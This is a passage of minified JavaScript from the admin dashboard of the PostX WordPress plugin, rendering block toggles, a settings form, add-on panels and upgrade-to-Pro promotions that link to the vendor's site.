0-1.37l1.3-1.3a.96.96 0 0 1 1.35 0l.04.04c.37.37.37.98 0 1.35Z"})),(0,a.createElement)("defs",null)),r.sun_line=(0,a.createElement)("svg",{viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M12 7.64a4.36 4.36 0 1 1-.01 8.73A4.36 4.36 0 0 1 12 7.64Zm0-2a6.35 6.35 0 1 0 0 12.71 6.35 6.35 0 0 0 0-12.7ZM12.98.96V2.8c0 .53-.43.96-.96.96h-.03a.96.96 0 0 1-.97-.96V.96c0-.53.43-.96.96-.96h.06c.52 0 .95.43.95.96ZM4.88 3.5l1.3 1.3c.38.38.38.98 0 1.36h-.01l-.01.02a.96.96 0 0 1-1.36.01L3.5 4.9a.96.96 0 0 1 0-1.35l.03-.04a.96.96 0 0 1 1.35 0ZM.96 11.02H2.8c.53 0 .96.43.96.96v.03c0 .53-.42.97-.96.97H.96a.96.96 0 0 1-.96-.96v-.06c0-.52.43-.95.96-.95ZM3.5 19.12l1.3-1.3a.96.96 0 0 1 1.38.02c.38.38.39.99.01 1.36l-1.3 1.3a.96.96 0 0 1-1.35 0l-.04-.03a.96.96 0 0 1 0-1.35ZM11.02 23.04V21.2c0-.53.43-.96.96-.96h.03c.53 0 .97.42.97.96v1.84c0 .53-.43.96-.96.96h-.06a.96.96 0 0 1-.95-.96ZM19.12 20.5l-1.3-1.3a.96.96 0 0 1 0-1.36h.01l.01-.02a.96.96 0 0 1 1.36-.01l1.3 1.3c.38.37.38.98 0 1.35l-.03.04a.96.96 0 0 1-1.35 0ZM23.04 12.98H21.2a.96.96 0 0 1-.96-.96v-.03c0-.53.42-.97.96-.97h1.84c.53 0 .96.43.96.96v.06c0 .52-.43.95-.96.95ZM20.5 4.88l-1.3 1.3a.96.96 0 0 1-1.36 0v-.01l-.02-.01a.96.96 0 0 1-.01-1.36l1.3-1.3a.96.96 0 0 1 1.35 0l.04.03c.38.37.38.98 0 1.35Z"}));const o=r},3644:(e,t,n)=>{"use strict";n.d(t,{Z:()=>d});var a=n(7294),r=n(2304),o=n(1383),i=n(3100),l=n(4766),s=n(8949),p=n(356);const c=()=>{const[e,t]=(0,a.useState)({}),[n,i]=(0,a.useState)(!0),[l,c]=(0,a.useState)({status:"",messages:[],state:!1}),d={post_list_1:{label:(0,r.__)("Post List #1","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6836",docs:"https://wpxpo.com/docs/postx/all-blocks/post-list-1/",icon:"post-list-1.svg"},post_slider_2:{label:(0,r.__)("Post Slider #2","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid7487",docs:"https://wpxpo.com/docs/postx/all-blocks/post-slider-2/",icon:"post-slider-2.svg"},post_list_4:{label:(0,r.__)("Post List #4","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6839",docs:"https://wpxpo.com/docs/postx/all-blocks/post-list-4/",icon:"post-list-4.svg"},post_slider_1:{label:(0,r.__)("Post Slider #1","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6840",docs:"https://wpxpo.com/docs/postx/all-blocks/post-slider-1/",icon:"post-slider-1.svg"},post_grid_4:{label:(0,r.__)("Post Grid #4","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6832",docs:"https://wpxpo.com/docs/postx/all-blocks/post-grid-4/",icon:"post-grid-4.svg"},post_module_1:{label:(0,r.__)("Post Module #1","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6825",docs:"https://wpxpo.com/docs/postx/all-blocks/post-module-1/",icon:"post-module-1.svg"},post_grid_2:{label:(0,r.__)("Post Grid #2","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6830",docs:"https://wpxpo.com/docs/postx/all-blocks/post-grid-2/",icon:"post-grid-2.svg"},advanced_search:{label:(0,r.__)("Search - PostX","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid8233",docs:"https://wpxpo.com/docs/postx/all-blocks/search-block",icon:"advanced-search.svg"},button_group:{label:(0,r.__)("Button Group","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid7952",docs:"https://wpxpo.com/docs/postx/all-blocks/button-block/",icon:"button-group.svg"}},u=(0,o.t)();(0,a.useEffect)((()=>{m()}),[]);const m=()=>{wp.apiFetch({path:"/ultp/v2/get_all_settings",method:"POST",data:{key:"key",value:"value"}}).then((e=>{e.success&&u.current&&(t(e.settings),i(!1))}))};return(0,a.createElement)(a.Fragment,null,l.state&&(0,a.createElement)(p.Z,{delay:2e3,toastMessages:l,setToastMessages:c}),Object.keys(d).map(((o,i)=>{const l=d[o];let p=!!l.default;return""==e[o]&&(p="yes"==e[o]),(0,a.createElement)("div",{key:o},n?(0,a.createElement)("div",{className:"ultp-dash-blocks-item ultp-dash-item-con"},(0,a.createElement)("div",{className:"ultp-blocks-item-meta"},(0,a.createElement)(s.Z,{type:"custom_size",c_s:{size1:24,unit1:"px",size2:24,unit2:"px",br:4}}),(0,a.createElement)(s.Z,{type:"custom_size",c_s:{size1:70,unit1:"px",size2:24,unit2:"px",br:4}})),(0,a.createElement)("div",{className:"ultp-blocks-control-option ultp-dash-control-options"},(0,a.createElement)(s.Z,{type:"custom_size",c_s:{size1:30,unit1:"px",size2:20,unit2:"px",br:4}}),(0,a.createElement)(s.Z,{type:"custom_size",c_s:{size1:40,unit1:"px",size2:20,unit2:"px",br:20}}))):(0,a.createElement)("div",{className:"ultp-dash-blocks-item ultp-dash-item-con"},(0,a.createElement)("div",{className:"ultp-blocks-item-meta"},(0,a.createElement)("img",{className:"ultp-blocks-item-icon",src:`${ultp_dashboard_pannel.url}assets/img/blocks/${l.icon}`,alt:l.label}),(0,a.createElement)("div",{className:"ultp-blocks-item-title"},l.label)),(0,a.createElement)("div",{className:"ultp-blocks-control-option ultp-dash-control-options"},l.live&&(0,a.createElement)("a",{href:l.live,className:"ultp-option-tooltip",target:"_blank",rel:"noreferrer"},(0,r.__)("Demo","ultimate-post")),(0,a.createElement)("input",{type:"checkbox",className:"ultp-blocks-enable",id:o,checked:p,onChange:()=>{(n=>{const a=e?.hasOwnProperty(n)&&"yes"!=e[n]?"yes":"";t({...e,[n]:a}),wp.apiFetch({path:"/ultp/v2/addon_block_action",method:"POST",data:{key:n,value:a}}).then((e=>{e.success&&c({status:"success",messages:[e.message],state:!0})}))})(o)}}),(0,a.createElement)("label",{className:"ultp-control__label",htmlFor:o}))))})))},d=()=>{const e=[{label:(0,r.__)("50+ Custom Layouts","ultimate-post")},{label:(0,r.__)("250+ Pattern","ultimate-post")},{label:(0,r.__)("45+ Custom Post Blocks","ultimate-post")},{label:(0,r.__)("Pin-point Customization","ultimate-post")},{label:(0,r.__)("Dynamic Site Building","ultimate-post")},{label:(0,r.__)("Limitless Flexibility","ultimate-post")}],[t,n]=(0,a.useState)(!1);return(0,a.createElement)("div",{className:"ultp-dashboard-container-grid"},(0,a.createElement)("div",{className:"ultp-dashboard-content"},(0,a.createElement)("div",{className:"ultp-dash-banner ultp-dash-item-con"},(0,a.createElement)("div",{className:"ultp-dash-banner-left"},(0,a.createElement)("div",{className:"ultp-dash-banner-title"},"Create Engaging Sites in Minutes…"),(0,a.createElement)("div",{className:"ultp-dash-banner-description"},"Thrilled to improve your WordPress blog? PostX supports you in creating and customizing stunning blogs! Design smooth, powerful websites - no compromises, unlimited options."),(0,a.createElement)("a",{className:"ultp-primary-alter-button",onClick:e=>{e.preventDefault(),window.location.replace("#startersites")}},(0,r.__)("Build with Starter Sites","ultimate-post"))),(0,a.createElement)("div",{className:"ultp-dash-banner-right"},t?(0,a.createElement)("iframe",{className:"ultp-dash-banner-right-video",src:"https://www.youtube.com/embed/FYgSe7kgb6M?autoplay=1",allow:"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; fullscreen",title:"Ultimate Post"}):(0,a.createElement)("div",{className:"ultp-dash-banner-right-img"},(0,a.createElement)("img",{src:ultp_dashboard_pannel.url+"assets/img/dashboard/dashboard_banner_right.png",alt:(0,r.__)("Ultimate Post","ultimate-post")}),(0,a.createElement)("div",{className:"ultp-dash-banner-right-play-button",onClick:()=>{n(!0)}},l.ZP.rightFillAngle)))),(0,a.createElement)("div",{className:"ultp-dash-blocks ultp-dash-item-con"},(0,a.createElement)("div",{className:"ultp-dash-blocks-heading"},(0,a.createElement)("div",{className:"ultp-dash-blocks-heading-title"},(0,r.__)("Blocks","ultimate-post")),(0,a.createElement)("a",{onClick:e=>{e.preventDefault(),window.location.replace("#blocks")},className:"ultp-transparent-button"},(0,r.__)("View All","ultimate-post"),l.ZP.angle_top_right_line)),(0,a.createElement)("div",{className:"ultp-dash-blocks-items"},(0,a.createElement)(c,null))),!ultp_dashboard_pannel?.active&&(0,a.createElement)("div",{className:"ultp-dash-pro-promo ultp-dash-item-con"},(0,a.createElement)("div",{className:"ultp-dash-pro-promo-left"},(0,a.createElement)("div",{className:"ultp-dash-pro-promo-left-title"},(0,r.__)("Go Pro & Unlock More! 🚀","ultimate-post")),(0,a.createElement)("div",{className:"ultp-dash-pro-promo-left-description"},(0,r.__)("Harness the true power of PostX: build, customize, and launch dynamic WordPress sites with unrestricted creative control - no code, no hassle.","ultimate-post")),(0,a.createElement)("div",{className:"ultp-dash-pro-promo-left-keyfeature"},e.map(((e,t)=>(0,a.createElement)("div",{className:"ultp-dash-pro-promo-left-keyfeature-item",key:e.label},l.ZP.right_circle_solid,e.label)))),(0,a.createElement)("a",{href:(0,i.Z)("https://www.wpxpo.com/postx/?utm_source=db-postx-topbar&utm_medium=upgrade-pro-sidebar&utm_campaign=postx-dashboard#pricing"),target:"_blank",rel:"noreferrer",className:"ultp-primary-alter-button"},l.ZP.rocket,"Upgrade to Pro")),(0,a.createElement)("img",{className:"ultp-dash-pro-promo-right-img",src:ultp_dashboard_pannel.url+"assets/img/dashboard/dashboard_pro_promo.png",alt:"Ultimate Post"}))),(0,a.createElement)("div",{className:"ultp-sidebar-features"},(0,a.createElement)("div",{className:"ultp-sidebar-card-item ultp-sidebar-starter-sites"},(0,a.createElement)("img",{src:ultp_dashboard_pannel.url+"assets/img/dashboard/sidebar-starter-sites.png",alt:"Starter Sites Make it Easy"}),(0,a.createElement)("div",{className:"ultp-sidebar-card-title"},"Starter Sites Make it Easy"),(0,a.createElement)("span",{className:"ultp-sidebar-card-description"},"Create awesome-looking webpages without any code with PostX starter sites - simply import the starter template of your choice. Drag, drop, and deploy your site in minutes."),(0,a.createElement)("div",{className:"ultp-sidebar-card-buttons"},(0,a.createElement)("a",{href:"https://www.wpxpo.com/postx/starter-sites/?utm_source=db-postx-started&utm_medium=starter-sites&utm_campaign=postx-dashboard&pux_link=dbstartersite",className:"ultp-primary-button",target:"_blank",rel:"noreferrer"},l.ZP.angle_top_right_line,"Explore Starter Templates"))),(0,a.createElement)("div",{className:"ultp-sidebar-card-item ultp-sidebar-community"},(0,a.createElement)("div",{className:"ultp-sidebar-card-title"},"PostX Community"),(0,a.createElement)("span",{className:"ultp-sidebar-card-description"},"Join the Facebook community of PostX to stay up-to-date and share your thoughts and feedback."),(0,a.createElement)("div",{className:"ultp-sidebar-card-buttons"},(0,a.createElement)("a",{href:"https://www.facebook.com/groups/gutenbergpostx",className:"ultp-primary-button",target:"_blank",rel:"noreferrer"},l.ZP.facebook,"Join PostX Community")))))}},4482:(e,t,n)=>{"use strict";n.d(t,{DC:()=>p,WO:()=>m,ac:()=>u,cs:()=>d,gR:()=>f,hx:()=>c,u4:()=>l});var a=n(7294),r=n(4766),o=n(3100),i=n(4190);n(3479);const{__}=wp.i18n,l={preloader_style:{type:"select",label:__("Preloader Style","ultimate-post"),options:{style1:__("Preloader Style 1","ultimate-post"),style2:__("Preloader Style 2","ultimate-post")},default:"style1",desc:__("Select Preloader Style.","ultimate-post"),tooltip:__("PostX has two preloader variations that display while loading PostX's blocks if you enable the preloader for that blocks.","ultimate-post")},container_width:{type:"number",label:__("Container Width","ultimate-post"),default:"1140",desc:__("Change Container Width of the Page Template(PostX Template).","ultimate-post"),tooltip:__("Here you can increase or decrease the container width. It will be applicable when you create any dynamic template with the PostX Builder or select PostX's Template while creating a page.","ultimate-post")},hide_import_btn:{type:"switch",label:__("Hide Template Kits Button","ultimate-post"),default:"",desc:__("Hide Template Kits Button from toolbar of the Gutenberg Editor.","ultimate-post"),tooltip:__("Click on the check box to hide the Template Kits button from posts, pages, and the Builder of PostX.","ultimate-post")},disable_image_size:{type:"switch",label:__("Disable Image Size","ultimate-post"),default:"",desc:__("Disable Image Size of the Plugins.","ultimate-post"),tooltip:__("Click on the check box to turn off the PostX's size of the post images.","ultimate-post")},disable_view_cookies:{type:"switch",label:__("Disable All Cookies","ultimate-post"),default:"",desc:__("Disable All Frontend Cookies (Cookies Used for Post View Count).","ultimate-post"),tooltip:__("Click on the check box to restrict PostX from collecting cookies. PostX contains cookies to display the post view count.","ultimate-post")},disable_google_font:{type:"switchButton",label:__("Disable All Google Fonts","ultimate-post"),default:"",desc:__("Disable All Google Fonts From Frontend and Backend PostX Blocks.","ultimate-post"),tooltip:__("Click the check box to disable all Google Fonts from PostX's typography options.","ultimate-post")}},s=({multikey:e,value:t,multiValue:n})=>{var o;const[i,l]=(0,a.useState)([...n]),[s,p]=(0,a.useState)(!1),[c,d]=(0,a.useState)(null!==(o=t.options)&&void 0!==o?o:{}),[u,m]=(0,a.useState)(""),f=e=>{e.target.closest(".ultp-ms-container")||p(!1)};return(0,a.useEffect)((()=>(document.addEventListener("mousedown",f),()=>document.removeEventListener("mousedown",f))),[]),(0,a.useEffect)((()=>{setTimeout((()=>{const e=Object.fromEntries(Object.entries(t.options).filter((([e,t])=>t.toLowerCase().includes(u.toLowerCase())||e.toLowerCase().includes(u.toLowerCase()))));d(e)}),500)}),[u]),(0,a.createElement)("div",{className:"ultp-settings-field"},(0,a.createElement)("input",{type:"hidden",name:e,value:i,"data-customprop":"custom_multiselect"}),(0,a.createElement)("div",{className:"ultp-ms-container"},(0,a.createElement)("div",{onClick:()=>p(!s),className:"ultp-ms-results-con cursor"},(0,a.createElement)("div",{className:"ultp-ms-results"},i.length>0?i?.map(((e,n)=>(0,a.createElement)("span",{key:n,className:"ultp-ms-selected"},t.options[e],(0,a.createElement)("span",{className:"ultp-ms-remove cursor",onClick:t=>{var n;t.stopPropagation(),n=e,l(i.filter((e=>e!=n)))}},r.ZP.close_circle_line)))):(0,a.createElement)("span",null,__("Select options"))),(0,a.createElement)("span",{onClick:()=>p(!s),className:"ultp-ms-results-collapse cursor"},r.ZP.collapse_bottom_line)),s&&c&&(0,a.createElement)("div",{className:"ultp-ms-options"},(0,a.createElement)("input",{type:"text",className:"ultp-multiselect-search",value:u,onChange:e=>m(e.target.value)}),Object.keys(c)?.map(((e,n)=>(0,a.createElement)("span",{className:"ultp-ms-option cursor",onClick:()=>(e=>{if(-1==i.indexOf(e)&&"all"!=e&&l([...i,e]),"all"===e){const e=Object.fromEntries(Object.entries(t.options).filter((([e,t])=>!t.toLowerCase().includes("all"))));l(Object.keys(e))}})(e),key:n,value:e},c[e]))))))},p=(e,t)=>(0,a.createElement)(a.Fragment,null,Object.keys(e).map(((n,r)=>{const o=e[n];return(0,a.createElement)("span",{key:r},"hidden"==o.type&&(0,a.createElement)("input",{key:n,type:"hidden",name:n,defaultValue:o.value}),"hidden"!=o.type&&(0,a.createElement)(a.Fragment,null,"heading"==o.type&&(0,a.createElement)("div",{className:"ultp_h2 ultp-settings-heading"},o.label)&&(0,a.createElement)(a.Fragment,null,o.desc&&(0,a.createElement)("div",{className:"ultp-settings-subheading"},o.desc)),"heading"!=o.type&&(0,a.createElement)("div",{className:"ultp-settings-wrap"},o.label&&(0,a.createElement)("strong",null,o.label,o.tooltip&&(0,a.createElement)(i.Z,{content:o.tooltip},(0,a.createElement)("span",{className:" cursor dashicons dashicons-editor-help"}))),(0,a.createElement)("div",{className:"ultp-settings-field-wrap"},((e,t,n)=>{const r=n.hasOwnProperty(e)?n[e]:t.default?t.default:"multiselect"==t.type?[]:"";switch(t.type){case"select":return(0,a.createElement)("div",{className:"ultp-settings-field"},(0,a.createElement)("select",{defaultValue:r,name:e,id:e},Object.keys(t.options).map(((e,n)=>(0,a.createElement)("option",{key:n,value:e},t.options[e])))),t.desc&&(0,a.createElement)("span",{className:"ultp-description"},t.desc));case"radio":return(0,a.createElement)("div",{className:"ultp-settings-field"},(0,a.createElement)("div",{className:"ultp-field-radio"},(0,a.createElement)("div",{className:"ultp-field-radio-items"},Object.keys(t.options).map(((n,o)=>(0,a.createElement)("div",{key:o,className:"ultp-field-radio-item"},(0,a.createElement)("input",{type:"radio",id:n,name:e,value:n,defaultChecked:n===r}),(0,a.createElement)("label",{htmlFor:n},t.options[n])))))),t.desc&&(0,a.createElement)("span",{className:"ultp-description"},t.desc));case"color":return(0,a.createElement)("div",{className:"ultp-settings-field"},(0,a.createElement)("input",{type:"text",defaultValue:r,className:"ultp-color-picker"}),(0,a.createElement)("span",{className:"ultp-settings-input-field"},(0,a.createElement)("input",{type:"text",name:e,className:"ultp-color-code",defaultValue:r})),t.desc&&(0,a.createElement)("span",{className:"ultp-description"},t.desc));case"number":return(0,a.createElement)("div",{className:"ultp-settings-field ultp-settings-input-field"},(0,a.createElement)("input",{type:"number",name:e,defaultValue:r}),t.desc&&(0,a.createElement)("span",{className:"ultp-description"},t.desc));case"switch":return(0,a.createElement)("div",{className:"ultp-settings-field ultp-settings-field-inline"},(0,a.createElement)("input",{value:"yes",type:"checkbox",name:e,defaultChecked:"yes"==r||"on"==r}),t.desc&&(0,a.createElement)("span",{className:"ultp-description"},t.desc));case"switchButton":return(0,a.createElement)("div",{className:"ultp-settings-field ultp-settings-field-inline"},(0,a.createElement)("input",{type:"checkbox",value:"yes",name:e,defaultChecked:"yes"==r||"on"==r}),t.desc&&(0,a.createElement)("span",{className:"ultp-description"},t.desc),(0,a.createElement)("div",null,(0,a.createElement)("span",{id:"postx-regenerate-css",className:`ultp-upgrade-pro-btn cursor ${"yes"==r?"active":""} `},(0,a.createElement)("span",{className:"dashicons dashicons-admin-generic"}),(0,a.createElement)("span",{className:"ultp-text"},__("Re-Generate Font Files","ultimate-post")))));case"multiselect":const n=Array.isArray(r)?r:[r];return(0,a.createElement)(s,{multikey:e,value:t,multiValue:n});case"text":return(0,a.createElement)("div",{className:"ultp-settings-field ultp-settings-input-field"},(0,a.createElement)("input",{type:"text",name:e,defaultValue:r}),(0,a.createElement)("span",{className:"ultp-description"},t.desc,t.link&&(0,a.createElement)("a",{className:"settingsLink",target:"_blank",href:t.link,rel:"noreferrer"},t.linkText)));case"textarea":return(0,a.createElement)("div",{className:"ultp-settings-field ultp-settings-input-field"},(0,a.createElement)("textarea",{name:e,defaultValue:r}),(0,a.createElement)("span",{className:"ultp-description"},t.desc,t.link&&(0,a.createElement)("a",{className:"settingsLink",target:"_blank",href:t.link,rel:"noreferrer"},t.linkText)));case"shortcode":return(0,a.createElement)("code",{className:"ultp-shortcode-copy"},"[",t.value,"]")}})(n,o,t)))))}))),c=(e,t,n="")=>{const r=n||__("Upgrade to Pro","ultimate-post");return(0,a.createElement)("a",{href:(0,o.Z)(e,t,""),className:"ultp-upgrade-pro-btn",target:"_blank",rel:"noreferrer"},r,"  ➤")},d=({tags:e,func:t,data:n})=>(0,a.createElement)("div",{className:"ultp-addon-lock-container-overlay"},(0,a.createElement)("div",{className:"ultp-addon-lock-container"},(0,a.createElement)("div",{className:"ultp-popup-unlock"},(0,a.createElement)("img",{src:`${ultp_option_panel.url}/assets/img/dashboard/${n.icon}`,alt:"lock icon"}),(0,a.createElement)("div",{className:"title ultp_h5"},n?.title),(0,a.createElement)("div",{className:"ultp-description"},n?.description),c("",e),(0,a.createElement)("button",{onClick:()=>{t(!1)},className:"ultp-popup-close"},r.ZP.close_line)))),u=(e,t,n,r="")=>(0,a.createElement)("a",{href:(0,o.Z)(e,t,""),className:"ultp-primary-button "+r,target:"_blank",rel:"noreferrer"},n),m=(e,t,n,r="")=>(0,a.createElement)("a",{href:(0,o.Z)(e,t,""),className:"ultp-secondary-button "+r,target:"_blank",rel:"noreferrer"},n),f=({proBtnTags:e,FRBtnTag:t})=>{const[n,i]=(0,a.useState)([{id:"go-pro-unlock-more",title:"Go Pro & Unlock More! 🚀",description:"Unlock the full potential of PostX to create and manage professional News Magazines and Blogging sites with complete creative freedom.",features:[__("Access to 40+ Blocks","ultimate-post"),__("Access to 250+ Patterns","ultimate-post"),__("All Starter Packs Access","ultimate-post"),__("Advanced Query Builder","ultimate-post"),__("Ajax Filter and Pagination","ultimate-post"),__("Custom Fonts with Typography","ultimate-post")],visible:!ultp_option_panel.active,buttons:[{type:"primary-alter",icon:r.ZP.rocket,url:"https://www.wpxpo.com/postx/?utm_source=db-postx-setting&utm_medium=upgrade-pro-sidebar&utm_campaign=postx-dashboard#pricing",label:"Upgrade Pro"},{type:"transparent-alter",label:"Free VS Pro"}]},{id:"feature-request",title:"Feature Request",description:"Can't find your desired feature? Let us know your requirements. We will definitely take them into our consideration.",buttons:[{type:"primary",url:"https://www.wpxpo.com/postx/roadmap/?utm_source=postx-menu&utm_medium=DB-roadmap&utm_campaign=postx-dashboard",label:"Request a Feature"}],visible:!0},{id:"web-community",title:"PostX Community",description:"Join the Facebook community of PostX to stay up-to-date and share your thoughts and feedback.",buttons:[{type:"primary",icon:r.ZP.facebook,url:"https://www.facebook.com/groups/gutenbergpostx",label:"Join PostX Community"}],visible:!0},{id:"news-tips",title:"News, Tips & Update",linkIcon:r.ZP.rightArrowLg,links:[{text:"Getting Started with PostX",url:"https://wpxpo.com/docs/postx/getting-started/?utm_source=postx-menu&utm_medium=DB-news-postx_GT&utm_campaign=postx-dashboard"},{text:"How to use the Dynamic Site Builder",url:"https://wpxpo.com/docs/postx/dynamic-site-builder/?utm_source=postx-menu&utm_medium=DB-news-DSB_guide&utm_campaign=postx-dashboard"},{text:"How to use the PostX Features",url:"https://wpxpo.com/docs/postx/postx-features/?utm_source=postx-menu&utm_medium=DB-news-feature_guide&utm_campaign=postx-dashboard"},{text:"PostX Blog",url:"https://www.wpxpo.com/category/postx/?utm_source=postx-menu&utm_medium=DB-news-blog&utm_campaign=postx-dashboard"}],visible:!0},{id:"rating",title:"Show your love",description:"Enjoying PostX? Give us a 5 Star review to support our ongoing work.",buttons:[{type:"primary",url:"https://wordpress.org/support/plugin/ultimate-post/reviews/",label:"Rate it Now"}],visible:!0}]);return(0,a.createElement)("div",{className:"ultp-sidebar-features"},!ultp_option_panel.active&&new Date>=new Date("2024-03-07")&&new Date<=new Date("2024-03-13")&&(0,a.createElement)("div",{className:"ultp-dashboard-pro-features ultp-dash-item-con"},(0,a.createElement)("a",{href:"https://www.wpxpo.com/postx/?utm_source=postx-ad&utm_medium=sidebar-banner&utm_campaign=postx-dashboard#pricing",target:"_blank",style:{textDecoration:"none !important",display:"block"},rel:"noreferrer"},(0,a.createElement)("img",{src:ultp_option_panel.url+"assets/img/dashboard/db_sidebar.jpg",style:{width:"100%",height:"100%",borderRadius:"8px"},alt:"40k+ Banner"}))),n.map(((e,t)=>!1!==e.visible&&(0,a.createElement)("div",{key:t,className:`ultp-sidebar-card-item ultp-sidebar-${e.id}`},"banner"===e.type?(0,a.createElement)("a",{href:e.bannerUrl,target:"_blank",rel:"noreferrer",style:{textDecoration:"none !important",display:"block"}},(0,a.createElement)("img",{src:e.imageUrl,style:{width:"100%",height:"100%",borderRadius:"8px"},alt:e.alt})):(0,a.createElement)(a.Fragment,null,e.title&&(0,a.createElement)("div",{className:"ultp-sidebar-card-title"},__(e.title,"ultimate-post")),e.description&&(0,a.createElement)("span",{className:"ultp-sidebar-card-description"},__(e.description,"ultimate-post")),e.features?(0,a.createElement)("div",{className:"ultp-pro-feature-lists"},e.features.map(((e,t)=>(0,a.createElement)("span",{key:t},r.ZP.right_circle_line," ",__(e,"ultimate-post"))))):e.links?(0,a.createElement)("div",{className:"ultp-sidebar-card-links"},e.links.map(((t,n)=>(0,a.createElement)("a",{className:"ultp-sidebar-card-link",key:n,target:"_blank",href:t.url,rel:"noreferrer"},e.linkIcon&&(0,a.createElement)("span",null,e.linkIcon),__(t.text,"ultimate-post"))))):null,e.buttons&&e.buttons.length>0&&(0,a.createElement)("div",{className:"ultp-sidebar-card-buttons"},e.buttons.map((e=>(({type:e="primary",icon:t,url:n,tags:r,label:i,classname:l=""})=>(0,a.createElement)("a",{href:(0,o.Z)(n,r,""),className:"ultp-"+e+"-button "+l,target:"_blank",rel:"noreferrer",key:i+Math.random()},t&&t,i))({type:e.type,icon:e.icon,url:e.url,tags:e.tags||"",label:e.label,classname:e.classname||""})))))))))}},860:(e,t,n)=>{"use strict";n.d(t,{Z:()=>m});var a=n(7294),r=n(1383),o=n(7763),i=n(4766),l=n(4482),s=n(1389),p=n(8949),c=n(356),d=(n(6129),n(1370)),u=n(6731);const{__}=wp.i18n,m=({integrations:e,generalDiscount:t={}})=>{const[n,m]=(0,a.useState)(""),[f,h]=(0,a.useState)(!1),[g,v]=(0,a.useState)({}),[_,w]=(0,a.useState)(""),[b,x]=(0,a.useState)({state:!1,status:""}),[y,k]=(0,a.useState)(""),[E,C]=(0,a.useState)(!1);let S=d.q;const M=ultp_dashboard_pannel.addons_settings,L=Object.entries(S);L.sort(((e,t)=>e[1].position-t[1].position)),S=Object.fromEntries(L),(0,a.useEffect)((()=>(P(),document.addEventListener("mousedown",A),()=>document.removeEventListener("mousedown",A))),[]);const N=[{label:__("45+ Blocks","ultimate-post"),descp:__("PostX comes with over 45 Gutenberg blocks","ultimate-post")},{label:__("250+ Patterns","ultimate-post"),descp:__("Get full access to all ready post sections","ultimate-post")},{label:__("50+ Starter Sites","ultimate-post"),descp:__("Pre-built websites are ready to import in one click","ultimate-post")},{label:__("Global Styles","ultimate-post"),descp:__("Control the full website’s colors and typography globally","ultimate-post")},{label:__("Dark/Light Mode","ultimate-post"),descp:__("Let your readers switch between light and dark modes","ultimate-post")},{label:__("Advanced Query Builder","ultimate-post"),descp:__("Display/reorder posts, pages, and custom post types","ultimate-post")},{label:__("Dynamic Site Builder","ultimate-post"),descp:__("Dynamically create templates for essential pages","ultimate-post")},{label:__("Ajax Powered Filter","ultimate-post"),descp:__("Let your visitors filter posts by categories and tags","ultimate-post")},{label:__("Advanced Post Slider","ultimate-post"),descp:__("Display posts in engaging sliders and carousels","ultimate-post")},{label:__("SEO Meta Support","ultimate-post"),descp:__("Replace the post excerpts with meta descriptions","ultimate-post")},{label:__("Custom Fonts","ultimate-post"),descp:__("Upload custom fonts per your requirements","ultimate-post")},{label:__("Ajax Powered Pagination","ultimate-post"),descp:__("PostX comes with three types of Ajax pagination","ultimate-post")}],Z=(0,r.t)(),P=()=>{wp.apiFetch({path:"/ultp/v2/get_all_settings",method:"POST",data:{key:"key",value:"value"}}).then((e=>{e.success&&Z.current&&v(e.settings)}))},z=e=>{C(!0),e.preventDefault();const t=new FormData(e.target),n={};for(const a of e.target.elements)a.name&&("checkbox"!==a.type||a.checked?"radio"===a.type?a.checked&&(n[a.name]=a.value):"select-multiple"===a.type?n[a.name]=t.getAll(a.name):"custom_multiselect"==a.dataset.customprop?n[a.name]=a.value?a.value.split(","):[]:n[a.name]=a.value:n[a.name]="");wp.apiFetch({path:"/ultp/v2/save_plugin_settings",method:"POST",data:{settings:n,action:"action",type:"type"}}).then((e=>{C(!1),e.success&&x({status:"success",messages:[e.message],state:!0})}))},A=e=>{e.target.closest(".ultp-addon-settings-popup")||m("")},B=[__("Access to Pro Starter Site Templates","ultimate-post"),__("Access to All Pro Features","ultimate-post"),__("Fully Unlocked Site Builder","ultimate-post"),__("And more…","ultimate-post")],H=[{label:__("Add-Ons","ultimate-post"),value:"addons",integration:!1},{label:__("Integration Add-Ons","ultimate-post"),value:"integration-addons",integration:!0}];return(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",{className:"ultp-dashboard-addons-container "+(Object.keys(g).length>0?"":" skeletonOverflow")},!e&&(0,a.createElement)("div",{className:"ultp-gettingstart-message"},(0,a.createElement)("div",{className:"ultp-start-left"},(0,a.createElement)("img",{src:ultp_dashboard_pannel.url+"assets/img/dashboard/dashboard_banner.jpg",alt:"Banner"}),(0,a.createElement)("div",{className:"ultp-start-content"},(0,a.createElement)("span",{className:"ultp-start-text"},__("Enjoy Pro-level Ready Templates!","ultimate-post")),(0,a.createElement)("div",{className:"ultp-start-btns"},(0,l.ac)("https://www.wpxpo.com/postx/starter-sites/?utm_source=db-postx-started&utm_medium=starter-sites&utm_campaign=postx-dashboard&pux_link=dbstartersite","",__("Explore Starter Sites","ultimate-post"),""),(0,l.WO)("https://www.wpxpo.com/postx/?utm_source=db-postx-started&utm_medium=details&utm_campaign=postx-dashboard","",__("Plugin Details","ultimate-post"),"")))),(0,a.createElement)("div",{className:"ultp-start-right"},(0,a.createElement)("div",{className:"ultp-dashborad-banner",style:{cursor:"pointer"},onClick:()=>k((0,a.createElement)("iframe",{width:"1100",height:"500",src:"https://www.youtube.com/embed/FYgSe7kgb6M?autoplay=1",title:__("How to add Product Filter to WooCommerce Shop Page","ultimate-post"),allow:"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; 